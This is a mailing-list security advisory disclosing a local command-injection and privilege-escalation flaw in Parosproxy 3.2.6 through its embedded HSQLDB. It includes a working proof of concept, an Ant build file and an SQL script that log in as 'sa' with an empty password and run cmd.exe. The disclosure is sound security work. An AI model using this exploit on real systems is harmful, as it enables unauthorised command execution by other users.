<<< Date Index >>>     <<< Thread Index >>>

Parosproxy 3.2.6: Local Exploitation, Command injection vulnerability



Hello,

first word to say: Parosproxy is a great tool, it has helped
me a lot during pentesting. Unfortunately the JDK until version
1.4.2_08 is vulnerable in a way that allows to use JDBC as an attack path.
Parosproxy uses JDBC to persist some state data.

Concerning the release 3.2.6 of Parosproxy [www.parosproxy.org], there is a
minor problem when running it with JDK 1.4.2 until subrelease 08.
It can be used to trigger command injection in the embedded HSQLDB via the
JDBC (localhost on port 9001) by another (like unprivileged user with
lesser rights than the paros process) user on the machine. This
results in privilege escalation.

Demonstration files (see below) have been provided to contact@xxxxxxxxxxxxxxx A similar problem with HSQLDB has occured a while ago when exploiting former
version of JBoss [http://www.illegalaccess.org/java/jboss.php], you
will find further details there.

According to parosproxy.org this problem has been solved with Paros
version 3.2.7. Please update your old 3.2.6 or older version, it's good
and it's free !

Sincerely
Marc Schönefeld


=======build.xml==========
<project name="sql" default="exec">
<target name="exec">
<sql
   driver="org.hsqldb.jdbcDriver"
   url="jdbc:hsqldb:hsql://localhost:9001"
   userid="sa"
   password=""
   print="true">
   <fileset dir=".">
   <include name="*.sql"/>
   </fileset>
   <classpath>
       <pathelement location="lib.jar"/>
       </classpath>
   </sql>
   </target>
   </project>
=======build.xml==========

=======exec.sql==========
CREATE ALIAS COMPDEBUG FOR
"org.apache.xml.utils.synthetic.JavaUtils.setDebug" ;
CALL COMPDEBUG(true);
CREATE ALIAS SETPROP FOR "java.lang.System.setProperty";
CALL  SETPROP ('org.apache.xml.utils.synthetic.javac','cmd.exe') ;
CREATE ALIAS COMPILE FOR
"org.apache.xml.utils.synthetic.JavaUtils.JDKcompile" ;
CALL  COMPILE('a','/c "cmd.exe /c notepad.exe
c:\windows\system32\drivers\etc\hosts >" ') ;
CREATE ALIAS GETPROP FOR "java.lang.System.getProperty";
CALL GETPROP('org.apache.xml.utils.synthetic.javac') ;
=======exec.sql==========